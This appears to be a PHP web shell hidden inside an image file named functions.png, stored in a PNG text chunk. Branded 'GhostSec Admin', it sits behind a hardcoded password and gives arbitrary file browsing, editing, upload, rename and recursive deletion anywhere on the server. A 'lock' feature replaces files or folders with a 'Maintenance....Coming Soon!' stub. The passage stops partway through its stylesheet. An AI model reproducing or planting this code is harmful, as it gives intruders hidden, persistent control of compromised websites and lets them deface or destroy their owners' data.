Edit File: functions.png

�PNG

���
IHDR���������U&����sRGB�������sBIT|d����!iTXtDescription�����<?php
session_start();
// Prevent browser caching
header("Cache-Control: no-cache, no-store, must-revalidate");
header("Pragma: no-cache");
header("Expires: 0");

// Store current scroll position before any redirect
if (isset($_SERVER['HTTP_REFERER']) && isset($_GET['path'])) {
    $_SESSION['last_path'] = $_GET['path'];
    $_SESSION['last_scroll'] = isset($_GET['scroll']) ? $_GET['scroll'] : 0;
}

/* ============================
   LOGIN SYSTEM
   ============================ */
$DEFAULT_PASS = "GeoDevz69";

// Logout
if (isset($_GET['logout'])) {
    $_SESSION = [];
    session_destroy();
    header("Location: ?");
    exit;
}

// Clear logs function
if (isset($_GET['clearlogs'])) {
    clearLogs();
    $_SESSION['toast'] = "Logs cleared successfully!";
    header("Location: ?" . getRedirectParams());
    exit;
}

// Helper function to get redirect parameters
function getRedirectParams() {
    $params = [];
    if (isset($_GET['path'])) {
        $params[] = 'path=' . rawurlencode($_GET['path']);
    }
    if (isset($_GET['search']) && $_GET['search'] !== '') {
        $params[] = 'search=' . rawurlencode($_GET['search']);
    }
    if (isset($_GET['scroll'])) {
        $params[] = 'scroll=' . intval($_GET['scroll']);
    }
    return !empty($params) ? implode('&', $params) : '';
}

if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        if (isset($_POST['password']) && $_POST['password'] === $DEFAULT_PASS) {
            session_regenerate_id(true);
            $_SESSION['logged_in'] = true;
            header("Location: ?");
            exit;
        } else {
            $error = "Wrong password!";
        }
    }
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width,initial-scale=1"/>
<title>GhostSec Admin - Login</title>
<style>
/* 3D DARK GRAY LOGIN THEME WITH GRAY 3D BUTTONS */
:root {
  --bg-dark: #1a1a1a;
  --bg-darker: #111111;
  --card-dark: #2d2d2d;
  --card-light: #3a3a3a;
  --text-light: #f0f0f0;
  --text-muted: #aaaaaa;
  --accent: #ffffff;
  --btn-light: #a0a0a0;
  --btn-dark: #808080;
  --btn-shadow: #606060;
  --btn-pressed: #b0b0b0;
}

* {
  box-sizing: border-box;
  margin: 0;
  padding: 0;
}

html, body {
  height: 100%;
  font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
  background: linear-gradient(145deg, var(--bg-darker), var(--bg-dark));
  color: var(--text-light);
  -webkit-font-smoothing: antialiased;
  overflow: hidden;
}

.center {
  min-height: 100vh;
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 24px;
  perspective: 1000px;
}

/* 3D CARD EFFECT */
.card {
  width: 420px;
  max-width: 96%;
  border-radius: 24px;
  padding: 36px 32px;
  background: linear-gradient(145deg, var(--card-dark), var(--card-light));
  box-shadow: 
    20px 20px 40px rgba(0, 0, 0, 0.5),
    -10px -10px 30px rgba(255, 255, 255, 0.05),
    inset 2px 2px 5px rgba(255, 255, 255, 0.1),
    inset -2px -2px 5px rgba(0, 0, 0, 0.3);
  border: 1px solid rgba(255, 255, 255, 0.08);
  text-align: center;
  transform-style: preserve-3d;
  animation: cardFloat 6s ease-in-out infinite;
}

@keyframes cardFloat {
  0%, 100% { transform: translateY(0) rotateX(2deg) rotateY(1deg); }
  50% { transform: translateY(-10px) rotateX(-1deg) rotateY(-1deg); }
}

.logo {
  width: 140px;
  height: 140px;
  border-radius: 50%;
  margin: -80px auto 20px;
  overflow: hidden;
  border: 8px solid rgba(0, 0, 0, 0.4);
  box-shadow: 
    0 15px 35px rgba(0, 0, 0, 0.7),
    inset 5px 5px 15px rgba(255, 255, 255, 0.1),
    inset -5px -5px 15px rgba(0, 0, 0, 0.4);
  transform: translateZ(20px);
  background: linear-gradient(145deg, #333333, #2a2a2a);
}

.logo img {
  width: 100%;
  height: 100%;
  object-fit: cover;
  display: block;
  filter: brightness(1.1) contrast(1.1);
}

.title {
  margin: 0 0 12px 0;
  font-weight: 800;
  letter-spacing: 2px;
  text-shadow: 3px 3px 6px rgba(0, 0, 0, 0.7);
  font-size: 28px;
  color: var(--accent);
  transform: translateZ(15px);
}

.msg {
  color: #ff6b6b;
  font-weight: 700;
  margin: 8px 0 0;
  text-shadow: 1px 1px 3px rgba(0, 0, 0, 0.5);
  transform: translateZ(10px);
}

.form {
  margin-top: 24px;
  transform: translateZ(10px);
}

.field {
  width: 92%;
  max-width: 340px;
  margin: 16px auto 0;
  position: relative;
}

/* 3D INPUT FIELD */
.input {
  width: 100%;
  padding: 18px 52px 18px 20px;
  border-radius: 16px;
  border: none;
  background: linear-gradient(145deg, #4a4a4a, #3a3a3a);
  color: var(--text-light);
  font-weight: 700;
  font-size: 16px;
  box-shadow: 
    inset 5px 5px 10px rgba(0, 0, 0, 0.4),
    inset -5px -5px 10px rgba(255, 255, 255, 0.1),
    5px 5px 15px rgba(0, 0, 0, 0.5);
  outline: none;
  transition: all 0.3s ease;
  letter-spacing: 1px;
}

.input:focus {
  box-shadow: 
    inset 3px 3px 8px rgba(0, 0, 0, 0.5),
    inset -3px -3px 8px rgba(255, 255, 255, 0.15),
    0 0 20px rgba(255, 255, 255, 0.1);
  transform: translateY(-2px);
}

.input::placeholder {
  color: var(--text-muted);
  font-weight: 600;
}

/* 3D GRAY SHOW BUTTON */
.show-btn {
  position: absolute;
  right: 10px;
  top: 50%;
  transform: translateY(-50%);
  padding: 10px 16px;
  border-radius: 12px;
  background: linear-gradient(145deg, var(--btn-light), var(--btn-dark));
  color: #222222;
  border: none;
  font-weight: 800;
  cursor: pointer;
  box-shadow: 
    5px 5px 15px rgba(0, 0, 0, 0.4),
    -3px -3px 10px rgba(255, 255, 255, 0.3);
  transition: all 0.2s ease;
  font-size: 13px;
  letter-spacing: 1px;
}

.show-btn:hover {
  transform: translateY(-50%) scale(1.05);
}

.show-btn:active {
  box-shadow: 
    inset 3px 3px 8px var(--btn-shadow),
    inset -3px -3px 8px rgba(255, 255, 255, 0.5);
  background: linear-gradient(145deg, var(--btn-pressed), var(--btn-dark));
  transform: translateY(-50%) scale(0.98);
}

.row {
  display: flex;
  gap: 16px;
  width: 92%;
  max-width: 340px;
  margin: 24px auto 0;
}

/* 3D GRAY BUTTONS */
.btn {
  flex: 1;
  padding: 16px 20px;
  border-radius: 16px;
  border: none;
  background: linear-gradient(145deg, var(--btn-light), var(--btn-dark));
  color: #222222;
  font-weight: 900;
  cursor: pointer;
  box-shadow: 
    8px 8px 20px rgba(0, 0, 0, 0.4),
    -5px -5px 15px rgba(255, 255, 255, 0.3);
  font-size: 15px;
  letter-spacing: 1.5px;
  transition: all 0.3s ease;
  position: relative;
  overflow: hidden;
  transform-style: preserve-3d;
}

.btn::before {
  content: '';
  position: absolute;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background: linear-gradient(145deg, rgba(255,255,255,0.1), rgba(0,0,0,0.1));
  border-radius: 16px;
  opacity: 0;
  transition: opacity 0.3s ease;
}

.btn:hover {
  transform: translateY(-3px) scale(1.03);
  box-shadow: 
    12px 12px 25px rgba(0, 0, 0, 0.5),
    -7px -7px 20px rgba(255, 255, 255, 0.4);
}

.btn:hover::before {
  opacity: 1;
}

.btn:active {
  transform: translateY(1px) scale(0.98);
  box-shadow: 
    inset 4px 4px 10px var(--btn-shadow),
    inset -4px -4px 10px rgba(255, 255, 255, 0.6);
  background: linear-gradient(145deg, var(--btn-pressed), var(--btn-dark));
}

.ghost {
  background: linear-gradient(145deg, var(--btn-light), var(--btn-dark));
}

.note {
  margin-top: 20px;
  color: var(--text-muted);
  font-size: 13px;
  line-height: 1.5;
  transform: translateZ(5px);
  text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.5);
}

/* Background 3D elements */
.bg-elements {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  pointer-events: none;
  z-index: -1;
}

.bg-element {
  position: absolute;
  background: rgba(255, 255, 255, 0.03);
  border-radius: 50%;
  filter: blur(40px);
}

.bg-1 {
  width: 300px;
  height: 300px;
  top: -100px;
  right: -100px;
  animation: float 20s infinite linear;
}

.bg-2 {
  width: 400px;
  height: 400px;
  bottom: -150px;
  left: -150px;
  animation: float 25s infinite linear reverse;
}

.bg-3 {
  width: 200px;
  height: 200px;
  top: 50%;
  left: 10%;
  animation: float 15s infinite linear;
}

@keyframes float {
  0% { transform: translate(0, 0) rotate(0deg); }
  100% { transform: translate(100px, 100px) rotate(360deg); }
}

@media (max-width: 480px) {
  .card {
    padding: 28px 24px;
    border-radius: 20px;
  }
  
  .logo {
    width: 110px;
    height: 110px;
    margin-top: -65px;
    border-width: 6px;
  }
  
  .title {
    font-size: 24px;
  }
  
  .field, .row {
    width: 96%;
  }
  
  .input {
    padding: 16px 48px 16px 18px;
  }
}
</style>
<script>
function togglePassword() {
  const f = document.getElementById('pw');
  if (!f) return;
  const b = document.getElementById('showBtn');
  if (f.type === 'password') {
    f.type = 'text';
    b.innerText = 'HIDE';
    b.setAttribute('aria-pressed', 'true');
  } else {
    f.type = 'password';
    b.innerText = 'SHOW';
    b.setAttribute('aria-pressed', 'false');
  }
}

function playKeySound() {
  try {
    const a = new Audio('https://cdn.pixabay.com/audio/2021/09/06/audio_730f0b5c79.mp3');
    a.volume = 0.3;
    a.play().catch(() => {});
  } catch(e) {}
}

// Add 3D tilt effect to card
document.addEventListener('DOMContentLoaded', function() {
  const card = document.querySelector('.card');
  if (card) {
    card.addEventListener('mousemove', function(e) {
      const rect = card.getBoundingClientRect();
      const x = e.clientX - rect.left;
      const y = e.clientY - rect.top;
      
      const centerX = rect.width / 2;
      const centerY = rect.height / 2;
      
      const rotateY = ((x - centerX) / centerX) * 3;
      const rotateX = ((centerY - y) / centerY) * 3;
      
      card.style.transform = `perspective(1000px) rotateX(${rotateX}deg) rotateY(${rotateY}deg) translateY(-5px)`;
    });
    
    card.addEventListener('mouseleave', function() {
      card.style.transform = 'perspective(1000px) rotateX(2deg) rotateY(1deg) translateY(0)';
      card.style.transition = 'transform 0.5s ease';
      setTimeout(() => {
        card.style.transition = '';
      }, 500);
    });
  }
});
</script>
</head>
<body>
<div class="bg-elements">
  <div class="bg-element bg-1"></div>
  <div class="bg-element bg-2"></div>
  <div class="bg-element bg-3"></div>
</div>

<div class="center">
  <div class="card" role="main" aria-labelledby="loginTitle">
    <div class="logo" aria-hidden="true"><img src="https://i.ibb.co/27S7vWvq/1762220205621.png" alt="logo"></div>
    <h2 id="loginTitle" class="title">ADMIN PANEL</h2>
    <?php if (isset($error)) echo '<div class="msg" role="alert">'.htmlspecialchars($error,ENT_QUOTES).'</div>'; ?>
    <form method="post" class="form" autocomplete="off" onsubmit="document.getElementById('pw').disabled=false;">
      <div class="field">
        <input id="pw" class="input" name="password" type="password" placeholder="ENTER PASSWORD" required autocomplete="off">
        <button id="showBtn" type="button" class="show-btn" aria-pressed="false" onclick="togglePassword()">SHOW</button>
      </div>
      <div class="row">
        <button type="button" class="btn ghost" onclick="playKeySound()">GET KEY</button>
        <button type="submit" class="btn">LOGIN</button>
      </div>
      <div class="note">Use your admin password to access the file manager. All actions are immediate and logged.</div>
    </form>
  </div>
</div>
</body>
</html>
<?php exit; }

/* ============================
   MAIN FILE MANAGER PAGE
   ============================ */

$path = isset($_GET['path']) ? $_GET['path'] : '.';
$fullPath = realpath($path);
if ($fullPath === false) $fullPath = realpath('.');

// Search functionality
$searchTerm = isset($_GET['search']) ? trim($_GET['search']) : '';
$searchResults = [];

if ($searchTerm !== '') {
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($fullPath, RecursiveDirectoryIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    
    foreach ($iterator as $file) {
        if ($file->isFile()) {
            $filename = $file->getFilename();
            $filepath = $file->getPathname();
            
            // Search by extension or filename
            if (stripos($filename, $searchTerm) !== false || 
                stripos($filepath, $searchTerm) !== false ||
                (strpos($searchTerm, '.') === 0 && substr($filename, -strlen($searchTerm)) === $searchTerm)) {
                $searchResults[] = $filepath;
            }
        }
    }
}

/* ============================ CREATE FILE/FOLDER FUNCTIONALITY ============================ */
if (isset($_GET['create'])) {
    $type = $_GET['create']; // 'file' or 'folder'
    
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $name = trim($_POST['name']);
        if ($name === '') {
            $_SESSION['toast'] = "Name cannot be empty!";
            header("Location: ?" . getRedirectParams());
            exit;
        }
        
        $fullPath = $fullPath . DIRECTORY_SEPARATOR . $name;
        
        if ($type === 'file') {
            if (file_exists($fullPath)) {
                $_SESSION['toast'] = "File already exists!";
            } elseif (touch($fullPath)) {
                $_SESSION['toast'] = "File created successfully!✅";
            } else {
                $_SESSION['toast'] = "Failed to create file!";
            }
        } elseif ($type === 'folder') {
            if (file_exists($fullPath)) {
                $_SESSION['toast'] = "Folder already exists!";
            } elseif (mkdir($fullPath, 0755, true)) {
                $_SESSION['toast'] = "Folder created successfully!✅";
            } else {
                $_SESSION['toast'] = "Failed to create folder!";
            }
        }
        
        header("Location: ?" . getRedirectParams());
        exit;
    }
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/>
<title>Create <?php echo htmlspecialchars($type,ENT_QUOTES); ?></title>
<style>
:root{--bg:#1b1b1b;--card:#2d2d2d;--btn-light:#a0a0a0;--btn-dark:#808080;--btn-shadow:#606060;--muted:#9aa0a6}
*{box-sizing:border-box}body{margin:0;font-family:Arial,Helvetica,sans-serif;background:linear-gradient(145deg,#111111,#1a1a1a);color:#f0f0f0;padding:20px}
.card{max-width:680px;margin:30px auto;padding:24px;border-radius:20px;background:linear-gradient(145deg,#2d2d2d,#3a3a3a);box-shadow:15px 15px 30px rgba(0,0,0,0.5), -8px -8px 20px rgba(255,255,255,0.05);border:1px solid rgba(255,255,255,0.05)}
h2{margin:0 0 16px 0;color:#ffffff}input[type=text]{width:100%;padding:14px 18px;border-radius:14px;border:none;margin-bottom:16px;font-weight:700;background:linear-gradient(145deg,#4a4a4a,#3a3a3a);color:#f0f0f0;box-shadow:inset 5px 5px 10px rgba(0,0,0,0.4), inset -5px -5px 10px rgba(255,255,255,0.1)}.btn{background:linear-gradient(145deg, var(--btn-light), var(--btn-dark));color:#222222;padding:14px 20px;border-radius:14px;font-weight:900;text-decoration:none;border:none;cursor:pointer;box-shadow:8px 8px 20px rgba(0,0,0,0.4), -5px -5px 15px rgba(255,255,255,0.3);transition:all 0.3s ease}
.btn:hover{transform:translateY(-3px);box-shadow:12px 12px 25px rgba(0,0,0,0.5), -7px -7px 20px rgba(255,255,255,0.4)}
.btn:active{transform:translateY(1px);box-shadow:inset 4px 4px 10px var(--btn-shadow), inset -4px -4px 10px rgba(255,255,255,0.6);background:linear-gradient(145deg, #b0b0b0, var(--btn-dark))}
</style>
</head>
<body>
<div class="card">
  <h2>Create <?php echo htmlspecialchars(ucfirst($type),ENT_QUOTES); ?></h2>
  <form method="post">
    <input type="text" name="name" placeholder="Enter <?php echo htmlspecialchars($type,ENT_QUOTES); ?> name" required autofocus>
    <button class="btn" type="submit">Create</button>
    &nbsp;<a href="?<?php echo getRedirectParams(); ?>" style="color:#9fe06c;font-weight:700;text-decoration:none;padding:12px 16px;border-radius:12px;background:linear-gradient(145deg,#3a3a3a,#2d2d2d);box-shadow:5px 5px 15px rgba(0,0,0,0.3), -3px -3px 10px rgba(255,255,255,0.05);display:inline-block;">Cancel</a>
  </form>
</div>
</body>
</html>
<?php exit; }

/* ============================ LOCK / UNLOCK HELPERS ============================ */
function lock_target_path($target) {
    $dir = dirname($target);
    $base = basename($target);
    $abs = $dir . DIRECTORY_SEPARATOR . $base;
    return $abs;
}
function make_backup_name($abs) {
    return $abs . '.locked.bak';
}
function is_locked_backup_present($abs) {
    return file_exists(make_backup_name($abs));
}
function create_lock_stub_text($abs) {
    $ext = strtolower(pathinfo($abs, PATHINFO_EXTENSION));
    if ($ext === 'txt') {
        return "Maintenance....Coming Soon!";
    }
    return "Maintenance....Coming Soon!";
}

/* Breadcrumb */
$parts = explode(DIRECTORY_SEPARATOR, $fullPath);
$breadcrumb = "";
$build = "";
foreach ($parts as $p) {
    if ($p === "") continue;
    $build .= DIRECTORY_SEPARATOR . $p;
    $escapedBuildForJs = htmlspecialchars(addslashes($build), ENT_QUOTES);
    $breadcrumb .= "<a href='?" . getRedirectParamsForLink($build) . "' onclick=\"setPath('".$escapedBuildForJs."')\">" . htmlspecialchars($p, ENT_QUOTES) . "</a> / ";
}

// Helper function for breadcrumb links
function getRedirectParamsForLink($newPath) {
    $params = ['path=' . rawurlencode($newPath)];
    if (isset($_GET['search']) && $_GET['search'] !== '') {
        $params[] = 'search=' . rawurlencode($_GET['search']);
    }
    if (isset($_GET['scroll'])) {
        $params[] = 'scroll=' . intval($_GET['scroll']);
    }
    return implode('&', $params);
}

/* DELETE - FIXED: Now properly deletes folders */
if (isset($_GET['delete'])) {
    $target = $_GET['delete'];
    if (is_file($target)) {
        unlink($target);
    } elseif (is_dir($target)) {
        // Use recursive delete function for directories
        deleteDirectory($target);
    }
    $_SESSION['toast'] = "Deleted successfully!✅";
    header("Location: ?" . getRedirectParams());
    exit;
}

/* RENAME */
if (isset($_GET['rename'])) {
    $renameFile = $_GET['rename'];

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $newName = dirname($renameFile) . "/" . $_POST['newname'];
        rename($renameFile, $newName);
        $_SESSION['toast'] = "Renamed successfully!✅";
        header("Location: ?" . getRedirectParams());
        exit;
    }
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/>
<title>Rename - <?php echo htmlspecialchars(basename($renameFile),ENT_QUOTES); ?></title>
<style>
:root{--bg:#1b1b1b;--card:#2d2d2d;--btn-light:#a0a0a0;--btn-dark:#808080;--btn-shadow:#606060;--muted:#9aa0a6}
*{box-sizing:border-box}body{margin:0;font-family:Arial,Helvetica,sans-serif;background:linear-gradient(145deg,#111111,#1a1a1a);color:#f0f0f0;padding:20px}
.card{max-width:680px;margin:30px auto;padding:24px;border-radius:20px;background:linear-gradient(145deg,#2d2d2d,#3a3a3a);box-shadow:15px 15px 30px rgba(0,0,0,0.5), -8px -8px 20px rgba(255,255,255,0.05);border:1px solid rgba(255,255,255,0.05)}
h2{margin:0 0 16px 0;color:#ffffff}input[type=text]{width:100%;padding:14px 18px;border-radius:14px;border:none;margin-bottom:16px;font-weight:700;background:linear-gradient(145deg,#4a4a4a,#3a3a3a);color:#f0f0f0;box-shadow:inset 5px 5px 10px rgba(0,0,0,0.4), inset -5px -5px 10px rgba(255,255,255,0.1)}.btn{background:linear-gradient(145deg, var(--btn-light), var(--btn-dark));color:#222222;padding:14px 20px;border-radius:14px;font-weight:900;text-decoration:none;border:none;cursor:pointer;box-shadow:8px 8px 20px rgba(0,0,0,0.4), -5px -5px 15px rgba(255,255,255,0.3);transition:all 0.3s ease}
.btn:hover{transform:translateY(-3px);box-shadow:12px 12px 25px rgba(0,0,0,0.5), -7px -7px 20px rgba(255,255,255,0.4)}
.btn:active{transform:translateY(1px);box-shadow:inset 4px 4px 10px var(--btn-shadow), inset -4px -4px 10px rgba(255,255,255,0.6);background:linear-gradient(145deg, #b0b0b0, var(--btn-dark))}
</style>
</head>
<body>
<div class="card">
  <h2>Rename: <?php echo htmlspecialchars(basename($renameFile),ENT_QUOTES); ?></h2>
  <form method="post">
    <input type="text" name="newname" value="<?php echo htmlspecialchars(basename($renameFile),ENT_QUOTES); ?>" required>
    <button class="btn" type="submit">Rename</button>
    &nbsp;<a href="?<?php echo getRedirectParams(); ?>" style="color:#9fe06c;font-weight:700;text-decoration:none;padding:12px 16px;border-radius:12px;background:linear-gradient(145deg,#3a3a3a,#2d2d2d);box-shadow:5px 5px 15px rgba(0,0,0,0.3), -3px -3px 10px rgba(255,255,255,0.05);display:inline-block;">Cancel</a>
  </form>
</div>
</body>
</html>
<?php exit; }

/* LOCK - FIXED VERSION */
if (isset($_GET['lock'])) {
    $raw = $_GET['lock'];
    $abs = lock_target_path($raw);
    
    if (!file_exists($abs)) {
        $_SESSION['toast'] = "File not found!";
        header("Location: ?" . getRedirectParams());
        exit;
    }
    
    $bak = make_backup_name($abs);
    
    // Prevent double-lock
    if (is_locked_backup_present($abs)) {
        $_SESSION['toast'] = "Item already locked.";
        header("Location: ?" . getRedirectParams());
        exit;
    }
    
    // For files: backup original content and replace with maintenance message
    if (is_file($abs)) {
        // Read original content
        $originalContent = file_get_contents($abs);
        
        // Create backup with original content
        if (file_put_contents($bak, $originalContent) === false) {
            $_SESSION['toast'] = "Failed to create backup!";
            header("Location: ?" . getRedirectParams());
            exit;
        }
        
        // Replace file with maintenance message
        $stub = create_lock_stub_text($abs);
        if (file_put_contents($abs, $stub) === false) {
            $_SESSION['toast'] = "Failed to lock file!";
            // Clean up backup if stub creation failed
            if (file_exists($bak)) {
                unlink($bak);
            }
            header("Location: ?" . getRedirectParams());
            exit;
        }
        
        // Set read-only permissions
        @chmod($abs, 0444);
        
    } elseif (is_dir($abs)) {
        // For directories: create backup and maintenance file
        if (!@rename($abs, $bak)) {
            $_SESSION['toast'] = "Failed to lock directory!";
            header("Location: ?" . getRedirectParams());
            exit;
        }
        
        // Recreate directory with maintenance notice
        @mkdir($abs, 0755, true);
        $stub = create_lock_stub_text($abs);
        @file_put_contents($abs . DIRECTORY_SEPARATOR . 'README.MAINTENANCE', $stub);
    }
    
    // Set appropriate success message
    $_SESSION['toast'] = "Locked Successfully!✅";
    
    header("Location: ?" . getRedirectParams());
    exit;
}

/* UNLOCK - FIXED VERSION */
if (isset($_GET['unlock'])) {
    $raw = $_GET['unlock'];
    $abs = lock_target_path($raw);
    $bak = make_backup_name($abs);
    
    // Check if backup exists
    if (!file_exists($bak)) {
        $_SESSION['toast'] = "No backup found to unlock!";
        header("Location: ?" . getRedirectParams());
        exit;
    }
    
    // Remove the current locked file/directory
    if (file_exists($abs)) {
        if (is_dir($abs)) {
            // For directories: remove maintenance file and directory
            $stubfile = $abs . DIRECTORY_SEPARATOR . 'README.MAINTENANCE';
            if (file_exists($stubfile)) {
                @unlink($stubfile);
            }
            // Remove all files in directory first
            $files = array_diff(scandir($abs), array('.', '..'));
            foreach ($files as $file) {
                $filePath = $abs . DIRECTORY_SEPARATOR . $file;
                if (is_file($filePath)) {
                    @unlink($filePath);
                }
            }
            @rmdir($abs);
        } else {
            // For files: simply remove the locked file
            @unlink($abs);
        }
    }
    
    // Restore from backup
    if (is_dir($bak)) {
        // For directories: restore the entire directory
        if (!@rename($bak, $abs)) {
            $_SESSION['toast'] = "Failed to restore directory!";
            header("Location: ?" . getRedirectParams());
            exit;
        }
    } else {
        // For files: restore the original content
        $originalContent = file_get_contents($bak);
        if (file_put_contents($abs, $originalContent) === false) {
            $_SESSION['toast'] = "Failed to restore file content!";
            header("Location: ?" . getRedirectParams());
            exit;
        }
        
        // Remove backup file after successful restoration
        @unlink($bak);
        
        // Restore writable permissions
        @chmod($abs, 0644);
    }
    
    $_SESSION['toast'] = "Unlocked Successfully!✅";
    header("Location: ?" . getRedirectParams());
    exit;
}

/* EDITOR */
if (isset($_GET['edit'])) {
    $editFile = $_GET['edit'];

if (is_locked_backup_present($editFile)) {
        echo "<div style='max-width:900px;margin:30px auto;padding:20px;border-radius:12px;background:linear-gradient(145deg,#2a2a2a,#1f1f1f);color:#fff;'>"
           . "<p style='color:#ff7b7b;font-weight:700;'>File is LOCKED – cannot edit.</p></div>";
        exit;
    }

if (!is_writable($editFile)) {
        echo "<div style='max-width:900px;margin:30px auto;padding:20px;border-radius:1212px;background:linear-gradient(145deg,#2a2a2a,#1f1f1f);color:#fff;'>"
           . "<p style='color:#ff7b7b;font-weight:700;'>File is read-only – cannot edit.</p></div>";
        exit;
    }

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        file_put_contents($editFile, $_POST['content']);
        $_SESSION['toast'] = "Saved successfully!✅";
        header("Location: ?" . getRedirectParams());
        exit;
    }

$data = htmlspecialchars(file_get_contents($editFile), ENT_QUOTES, 'UTF-8');
?>
<!DOCTYPE html>
<html lang="en">
<head><meta charset="utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><title>Editing: <?php echo htmlspecialchars($editFile,ENT_QUOTES); ?></title>
<style>
:root{--bg:#1b1b1b;--card:#2d2d2d;--btn-light:#a0a0a0;--btn-dark:#808080;--btn-shadow:#606060}
*{box-sizing:border-box}body{margin:0;font-family:Arial,Helvetica,sans-serif;background:linear-gradient(145deg,#111111,#1a1a1a);color:#f0f0f0;padding:20px}
.card{max-width:1100px;margin:20px auto;padding:22px;border-radius:20px;background:linear-gradient(145deg,#2f3133,#232425);border:1px solid rgba(255,255,255,0.05);box-shadow:15px 15px 30px rgba(0,0,0,0.5), -8px -8px 20px rgba(255,255,255,0.05)}
h2{margin:0 0 16px 0;color:#ffffff}textarea{width:100%;height:520px;border-radius:14px;padding:16px;border:none;font-family:monospace;resize:vertical;background:linear-gradient(145deg,#4a4a4a,#3a3a3a);color:#f0f0f0;box-shadow:inset 5px 5px 10px rgba(0,0,0,0.4), inset -5px -5px 10px rgba(255,255,255,0.1)}button.btn{padding:14px 20px;border-radius:14px;border:none;background:linear-gradient(145deg, var(--btn-light), var(--btn-dark));color:#222222;font-weight:900;cursor:pointer;margin-top:12px;box-shadow:8px 8px 20px rgba(0,0,0,0.4), -5px -5px 15px rgba(255,255,255,0.3);transition:all 0.3s ease}
button.btn:hover{transform:translateY(-3px);box-shadow:12px 12px 25px rgba(0,0,0,0.5), -7px -7px 20px rgba(255,255,255,0.4)}
button.btn:active{transform:translateY(1px);box-shadow:inset 4px 4px 10px var(--btn-shadow), inset -4px -4px 10px rgba(255,255,255,0.6);background:linear-gradient(145deg, #b0b0b0, var(--btn-dark))}
</style>
</head>
<body>
<div class="card">
  <h2>Editing: <?php echo htmlspecialchars($editFile,ENT_QUOTES); ?></h2>
  <form method="post">
    <textarea name="content"><?php echo $data; ?></textarea><br>
    <button class="btn" type="submit">Save</button>
    &nbsp;<a href="?<?php echo getRedirectParams(); ?>" style="color:#9fe06c;font-weight:700;text-decoration:none;padding:12px 16px;border-radius:12px;background:linear-gradient(145deg,#3a3a3a,#2d2d2d);box-shadow:5px 5px 15px rgba(0,0,0,0.3), -3px -3px 10px rgba(255,255,255,0.05);display:inline-block;">Back</a>
  </form>
</div>
</body>
</html>
<?php exit; }

/* UPLOAD - FIXED VERSION */
if (isset($_FILES['upload']) && isset($_FILES['upload']['tmp_name']) && is_uploaded_file($_FILES['upload']['tmp_name'])) {
    $destName = basename($_FILES['upload']['name']);
    $uploadPath = $fullPath . '/' . $destName;
    
    // Check if destination is writable
    if (!is_writable($fullPath)) {
        $_SESSION['toast'] = "Upload failed: Directory is not writable!";
        header("Location: ?" . getRedirectParams());
        exit;
    }
    
    // Move uploaded file
    if (move_uploaded_file($_FILES['upload']['tmp_name'], $uploadPath)) {
        $_SESSION['toast'] = "File Uploaded!✅";
    } else {
        $_SESSION['toast'] = "Upload failed! Please check permissions.";
    }
    header("Location: ?" . getRedirectParams());
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/>
<title>Ghost Security - File Manager</title>
<style>
/* 3D DARK THEME WITH GRAY 3D BUTTONS */
:root{
  --bg-dark:#111111;
  --bg-light:#1a1a1a;
  --card-dark:#2d2d2d;
  --card-light:#3a3a3a;
  --muted:#9aa0a6;
  --btn-light:#a0a0a0;
  --btn-dark:#808080;
  --btn-shadow:#606060;
  --accent:#ffffff;
  --border: rgba(255,255,255,0.05);
  --elev: 0 15px 30px rgba(0,0,0,0.4);
}
*{box-sizing:border-box}
body{margin:0;font-family:Arial,Helvetica,sans-serif;background:linear-gradient(145deg,var(--bg-dark),var(--bg-light));color:#f0f0f0;padding:20px}
.wrap{max-width:1400px;margin:0 auto;padding:8px}

/* TOP CARD */
.top-card{
  border-radius:20px;
  padding:22px 24px;
  background:linear-gradient(145deg,var(--card-dark),var(--card-light));
  box-shadow:
    15px 15px 30px rgba(0,0,0,0.5),
    -8px -8px 20px rgba(255,255,255,0.05),
    inset 3px 3px 8px rgba(255,255,255,0.05),
    inset -3px -3px 8px rgba(0,0,0,0.3);
  border:1px solid var(--border);
  display:flex;
  gap:20px;
  align-items:center;
  justify-content:space-between;
  flex-wrap:wrap;
}

/* BRAND */
.brand{
  display:flex;
  align-items:center;
  gap:16px;
  min-width:260px;
}
.brand img{width:58px;height:58px;border-radius:12px;object-fit:cover;border:1px solid var(--border);box-shadow:5px 5px 15px rgba(0,0,0,0.4)}
.brand h2{margin:0;font-size:20px;letter-spacing:1px;color:var(--accent);text-shadow:2px 2px 4px rgba(0,0,0,0.5)}
.brand .sub{font-size:13px;color:var(--muted);text-shadow:1px 1px 2px rgba(0,0,0,0.3)}

/* CONTROLS */
.controls{
  display:flex;
  gap:14px;
  align-items:center;
  margin-left:auto;
  flex-wrap:wrap;
}

/* SEARCH BOX */
.search-box{
  display:flex;
  gap:10px;
  align-items:center;
  background:transparent;
  min-width:320px;
}
.search-input{
  flex:1;
  padding:12px 16px;
  border-radius:14px;
  border:none;
  background:linear-gradient(145deg,#4a4a4a,#3a3a3a);
  color:#f0f0f0;
  font-weight:700;
  box-shadow:
    inset 5px 5px 10px rgba(0,0,0,0.4),
    inset -5px -5px 10px rgba(255,255,255,0.1);
  font-size:14px;
  outline:none;
  min-width:220px;
  transition:all 0.3s ease;
}
.search-input:focus{
  box-shadow:
    inset 3px 3px 8px rgba(0,0,0,0.5),
    inset -3px -3px 8px rgba(255,255,255,0.15),
